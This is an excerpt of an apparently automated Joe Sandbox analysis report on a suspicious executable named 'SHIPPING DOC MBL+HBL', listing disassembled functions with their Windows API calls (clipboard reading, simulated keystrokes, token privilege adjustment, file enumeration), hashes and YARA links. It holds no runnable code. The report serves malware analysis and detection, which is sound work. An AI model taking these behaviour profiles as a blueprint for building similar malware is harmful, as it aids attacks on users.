                    • API ID: Library$Free$Load__wfsopen_memmove
                    • String ID:
                    • API String ID: 1396898556-0
                    • Opcode ID: ee60846ba517f4c92f5117840e829d99c07b2fd758860423fa4843051e19b7b9
                    • Instruction ID: 24c33530d46c507136635d204cc38036cb947b49b95fe97294ce34a3100e3c69
                    • Opcode Fuzzy Hash: ee60846ba517f4c92f5117840e829d99c07b2fd758860423fa4843051e19b7b9
                    • Instruction Fuzzy Hash: 0A11E7F2700206AADB10FF70DD56FAEB7E99F40710F10A829FA41B61C1DA719A55DB50
                    Function 00E400DE Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID:
                    • API String ID: 1473721057-0
                    • Opcode ID: 07aba6574832283db518e8b17cf78a67b70f395c6eb7810e1ab0fd3f75d92616
                    • Instruction ID: 132bc56388db2e885cc9ec041899e93cc66a89f24526ef8dcd1850eb88e57fe8
                    • Opcode Fuzzy Hash: 07aba6574832283db518e8b17cf78a67b70f395c6eb7810e1ab0fd3f75d92616
                    • Instruction Fuzzy Hash: 0C214470508301CFDB14DF14C444A5ABBE0BF88318F08996CE99A677A2C731E886CB92
                    Function 00E07F41 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: 1c38cca95f6358379de2d9c40b720d035e2a3922818e7d4ef8cb35a2f7d1b5e5
                    • Instruction ID: 104f999549d5e261e7272af8392a3e55114e1ab296392ae22705e6985965ea02
                    • Opcode Fuzzy Hash: 1c38cca95f6358379de2d9c40b720d035e2a3922818e7d4ef8cb35a2f7d1b5e5
                    • Instruction Fuzzy Hash: 7901D6B27047167ED7209F28DC02E67BBE49B44760F14852EF65ADA1D1EA31E4408B50
                    Function 00E249D3 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                    Download Yara Rule
                    APIs
                    • __lock_file.LIBCMT ref: 00E24A16
                      • Part of subcall function 00E28CA8: __getptd_noexit.LIBCMT ref: 00E28CA8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: __getptd_noexit__lock_file
                    • String ID:
                    • API String ID: 2597487223-0
                    • Opcode ID: 18e06d5c259b7e30c23976da6914889891ebbe7e4af1de487d6a0bfbd75d0292
                    • Instruction ID: 055c143feb0f07c9f7139f69569c56aa25db0907b5e0ac77242f4aa4f4f9e15c
                    • Opcode Fuzzy Hash: 18e06d5c259b7e30c23976da6914889891ebbe7e4af1de487d6a0bfbd75d0292
                    • Instruction Fuzzy Hash: 54F0C2F1941269EBDF11AF74AD063EF76E1AF00325F04A514F424BA1D2EBB88A11DF91
                    Function 00E04FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                    Download Yara Rule
                    APIs
                    • FreeLibrary.KERNEL32(?,?,00EC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E04FDE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: d2e1ece1e17410e5dbe4611b930009e3d3615f73c9fc4d900a4dc63181d48711
                    • Instruction ID: 1621518f75eaa6373fb143d6d4352cc1d7a3a20f3b4e23c906056c0a3814057c
                    • Opcode Fuzzy Hash: d2e1ece1e17410e5dbe4611b930009e3d3615f73c9fc4d900a4dc63181d48711
                    • Instruction Fuzzy Hash: 0CF030F1205712CFC7349F64E694852BBE2AF04329324AA3EE2D6A2690C731A884DF40
                    Function 00E20911 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                    Download Yara Rule
                    APIs
                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E20930
                      • Part of subcall function 00E07D2C: _memmove.LIBCMT ref: 00E07D66
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: LongNamePath_memmove
                    • String ID:
                    • API String ID: 2514874351-0
                    • Opcode ID: aac691d1be95fa888a781df8de493e4b2c77a9e4994cfc4e68820109eccd75bc
                    • Instruction ID: 92a15943cbd6aefe05d134dabcbdb2bae7b11b31f0923f3a7fc418cf2ee1a166
                    • Opcode Fuzzy Hash: aac691d1be95fa888a781df8de493e4b2c77a9e4994cfc4e68820109eccd75bc
                    • Instruction Fuzzy Hash: 8AE0CD369051285BC720D6589C05FFA77EDDFC9791F0501F5FC4CE7254D9606C818690
                    Function 00E253CB Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: __wfsopen
                    • String ID:
                    • API String ID: 197181222-0
                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                    • Instruction ID: fe25a015c09ed39c2421ffc0bf96733de6104c05132b4a51fb3d8a0a49dc2186
                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                    • Instruction Fuzzy Hash: DDB0927644020C77CE012A82FC02A593B999B507A4F409020FF0C281A2A6B3A6609689
                    Function 00FE9A88 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                    Download Yara Rule
                    APIs
                    • Sleep.KERNELBASE(000001F4), ref: 00FE9A99
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711546126.0000000000FE7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FE7000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_fe7000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                    • Instruction ID: 2fe3ea6d4d003c82fe3702f14950a4f1e68ef175fcb8c6124092d23abde946d4
                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                    • Instruction Fuzzy Hash: E6E0E67494410DDFDB00DFB4D54969D7BF4EF04701F100165FD01D2280D7709D509A72

                    Non-executed Functions

                    Function 00E8CB26 Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00E8CBA1
                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E8CBFF
                    • GetWindowLongW.USER32(?,000000F0), ref: 00E8CC40
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E8CC6A
                    • SendMessageW.USER32 ref: 00E8CC93
                    • _wcsncpy.LIBCMT ref: 00E8CCFF
                    • GetKeyState.USER32(00000011), ref: 00E8CD20
                    • GetKeyState.USER32(00000009), ref: 00E8CD2D
                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E8CD43
                    • GetKeyState.USER32(00000010), ref: 00E8CD4D
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E8CD76
                    • SendMessageW.USER32 ref: 00E8CD9D
                    • SendMessageW.USER32(?,00001030,?,00E8B37C), ref: 00E8CEA1
                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00E8CEB7
                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00E8CECA
                    • SetCapture.USER32(?), ref: 00E8CED3
                    • ClientToScreen.USER32(?,?), ref: 00E8CF38
                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00E8CF45
                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E8CF5F
                    • ReleaseCapture.USER32 ref: 00E8CF6A
                    • GetCursorPos.USER32(?), ref: 00E8CFA4
                    • ScreenToClient.USER32(?,?), ref: 00E8CFB1
                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E8D00D
                    • SendMessageW.USER32 ref: 00E8D03B
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E8D078
                    • SendMessageW.USER32 ref: 00E8D0A7
                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00E8D0C8
                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00E8D0D7
                    • GetCursorPos.USER32(?), ref: 00E8D0F7
                    • ScreenToClient.USER32(?,?), ref: 00E8D104
                    • GetParent.USER32(?), ref: 00E8D124
                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E8D18D
                    • SendMessageW.USER32 ref: 00E8D1BE
                    • ClientToScreen.USER32(?,?), ref: 00E8D21C
                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00E8D24C
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E8D276
                    • SendMessageW.USER32 ref: 00E8D299
                    • ClientToScreen.USER32(?,?), ref: 00E8D2EB
                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00E8D31F
                      • Part of subcall function 00E025DB: GetWindowLongW.USER32(?,000000EB), ref: 00E025EC
                    • GetWindowLongW.USER32(?,000000F0), ref: 00E8D3BB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                    • String ID: @GUI_DRAGID$F$pb
                    • API String ID: 3977979337-96320988
                    • Opcode ID: d65dda0cd0064f8b19be68387ec1de8467a7807e7e82bbd6f9de74192fdefb95
                    • Instruction ID: 98d82fab6efabe913a8ca5330e5ff64a7809ae99b273a9a6a76386aecdd8f174
                    • Opcode Fuzzy Hash: d65dda0cd0064f8b19be68387ec1de8467a7807e7e82bbd6f9de74192fdefb95
                    • Instruction Fuzzy Hash: 2542A0312046019FD724EF24C844E9ABBE5FF4A314F241A29F55DB72A1D732EC49DBA2
                    Function 00E170FE Relevance: 54.0, APIs: 19, Strings: 9, Instructions: 5018COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _memmove$_memset
                    • String ID: ]$DEFINE$Oa$P\$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                    • API String ID: 1357608183-1126055449
                    • Opcode ID: 3a56e71ffb2234701189b24202c54ce89c794fb2bc1be2cb9c91e30c1f92bb42
                    • Instruction ID: defdfc85fda3734778913614562e6274f97fc6d1b8d8b9415bd40833d4005eac
                    • Opcode Fuzzy Hash: 3a56e71ffb2234701189b24202c54ce89c794fb2bc1be2cb9c91e30c1f92bb42
                    • Instruction Fuzzy Hash: 0993D071A00219DBDB24CFA8C881BEDB7B1FF48715F24956AED55BB280E7709E85CB40
                    Function 00E04A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetForegroundWindow.USER32(00000000,?), ref: 00E04A3D
                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E3D9BE
                    • IsIconic.USER32(?), ref: 00E3D9C7
                    • ShowWindow.USER32(?,00000009), ref: 00E3D9D4
                    • SetForegroundWindow.USER32(?), ref: 00E3D9DE
                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E3D9F4
                    • GetCurrentThreadId.KERNEL32 ref: 00E3D9FB
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E3DA07
                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00E3DA18
                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00E3DA20
                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 00E3DA28
                    • SetForegroundWindow.USER32(?), ref: 00E3DA2B
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E3DA40
                    • keybd_event.USER32(00000012,00000000), ref: 00E3DA4B
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E3DA55
                    • keybd_event.USER32(00000012,00000000), ref: 00E3DA5A
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E3DA63
                    • keybd_event.USER32(00000012,00000000), ref: 00E3DA68
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E3DA72
                    • keybd_event.USER32(00000012,00000000), ref: 00E3DA77
                    • SetForegroundWindow.USER32(?), ref: 00E3DA7A
                    • AttachThreadInput.USER32(?,?,00000000), ref: 00E3DAA1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                    • String ID: Shell_TrayWnd
                    • API String ID: 4125248594-2988720461
                    • Opcode ID: b4a70b1bbc4285f660fbe6df8cda50765b754554f1827fd9ad8318ac403d2759
                    • Instruction ID: b35a853e4928d6fd2bdce543821cade4b184d17042184788c244150614e2e755
                    • Opcode Fuzzy Hash: b4a70b1bbc4285f660fbe6df8cda50765b754554f1827fd9ad8318ac403d2759
                    • Instruction Fuzzy Hash: 10315271A44318BEEB216F629C49F7E7E6CEB44B50F104025FA08FA1D1D6B05D51EBA0
                    Function 00E58638 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E58AA3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E58AED
                      • Part of subcall function 00E58AA3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E58B1A
                      • Part of subcall function 00E58AA3: GetLastError.KERNEL32 ref: 00E58B27
                    • _memset.LIBCMT ref: 00E5867B
                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00E586CD
                    • CloseHandle.KERNEL32(?), ref: 00E586DE
                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E586F5
                    • GetProcessWindowStation.USER32 ref: 00E5870E
                    • SetProcessWindowStation.USER32(00000000), ref: 00E58718
                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E58732
                      • Part of subcall function 00E584F3: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E58631), ref: 00E58508
                      • Part of subcall function 00E584F3: CloseHandle.KERNEL32(?,?,00E58631), ref: 00E5851A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                    • String ID: $default$winsta0
                    • API String ID: 2063423040-1027155976
                    • Opcode ID: 91b3257844ed667c0e45a26d778a0cb54184f75ce0f54b0a759c6d961da38a99
                    • Instruction ID: 24cd530df2333661b45f7016066404fca1ce0fc28d8688d4b48bb482d8d51e41
                    • Opcode Fuzzy Hash: 91b3257844ed667c0e45a26d778a0cb54184f75ce0f54b0a759c6d961da38a99
                    • Instruction Fuzzy Hash: 3781AB71900209AFDF159FA1DE45AEE7BB8EF0830AF445529FD18B6161DB318E18DB60
                    Function 00E7407C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                    Download Yara Rule
                    APIs
                    • OpenClipboard.USER32(00E8F910), ref: 00E740A6
                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00E740B4
                    • GetClipboardData.USER32(0000000D), ref: 00E740BC
                    • CloseClipboard.USER32 ref: 00E740C8
                    • GlobalLock.KERNEL32(00000000), ref: 00E740E4
                    • CloseClipboard.USER32 ref: 00E740EE
                    • GlobalUnlock.KERNEL32(00000000), ref: 00E74103
                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00E74110
                    • GetClipboardData.USER32(00000001), ref: 00E74118
                    • GlobalLock.KERNEL32(00000000), ref: 00E74125
                    • GlobalUnlock.KERNEL32(00000000), ref: 00E74159
                    • CloseClipboard.USER32 ref: 00E74269
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                    • String ID:
                    • API String ID: 3222323430-0
                    • Opcode ID: bf78a3581005d9f6fc4334e8ed49fab5a9bcc5442817db501f8995726e14a611
                    • Instruction ID: 0d7a8fa783af089ab56dca3cee15654bd52ae96f194b87a9df8b3c62cb5a5b0c
                    • Opcode Fuzzy Hash: bf78a3581005d9f6fc4334e8ed49fab5a9bcc5442817db501f8995726e14a611
                    • Instruction Fuzzy Hash: 70519D75204302AFD311BF61DC95F6A77A8AF84B00F109629F55AF21F2DF70D9498BA2
                    Function 00E6C7E8 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 00E6C819
                    • FindClose.KERNEL32(00000000), ref: 00E6C86D
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E6C892
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E6C8A9
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E6C8D0
                    • __swprintf.LIBCMT ref: 00E6C91C
                    • __swprintf.LIBCMT ref: 00E6C95F
                      • Part of subcall function 00E07F41: _memmove.LIBCMT ref: 00E07F82
                    • __swprintf.LIBCMT ref: 00E6C9B3
                      • Part of subcall function 00E23818: __woutput_l.LIBCMT ref: 00E23871
                    • __swprintf.LIBCMT ref: 00E6CA01
                      • Part of subcall function 00E23818: __flsbuf.LIBCMT ref: 00E23893
                      • Part of subcall function 00E23818: __flsbuf.LIBCMT ref: 00E238AB
                    • __swprintf.LIBCMT ref: 00E6CA50
                    • __swprintf.LIBCMT ref: 00E6CA9F
                    • __swprintf.LIBCMT ref: 00E6CAEE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                    • API String ID: 3953360268-2428617273
                    • Opcode ID: 810de4e2259a7bdf34525ecdd1a8e3db45e52691cc8904a64349154dd78fa716
                    • Instruction ID: 931a41180cfbb3caa072203c8527c33097490b444ca3a9873dcc3cc54ccb5d7b
                    • Opcode Fuzzy Hash: 810de4e2259a7bdf34525ecdd1a8e3db45e52691cc8904a64349154dd78fa716
                    • Instruction Fuzzy Hash: CCA15EB2508305ABC714EF64D886DAFB3ECEF94700F405919F585E7192EB34EA48CB62
                    Function 00E6F021 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00E6F042
                    • _wcscmp.LIBCMT ref: 00E6F057
                    • _wcscmp.LIBCMT ref: 00E6F06E
                    • GetFileAttributesW.KERNEL32(?), ref: 00E6F080
                    • SetFileAttributesW.KERNEL32(?,?), ref: 00E6F09A
                    • FindNextFileW.KERNEL32(00000000,?), ref: 00E6F0B2
                    • FindClose.KERNEL32(00000000), ref: 00E6F0BD
                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00E6F0D9
                    • _wcscmp.LIBCMT ref: 00E6F100
                    • _wcscmp.LIBCMT ref: 00E6F117
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E6F129
                    • SetCurrentDirectoryW.KERNEL32(00EB8920), ref: 00E6F147
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E6F151
                    • FindClose.KERNEL32(00000000), ref: 00E6F15E
                    • FindClose.KERNEL32(00000000), ref: 00E6F170
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
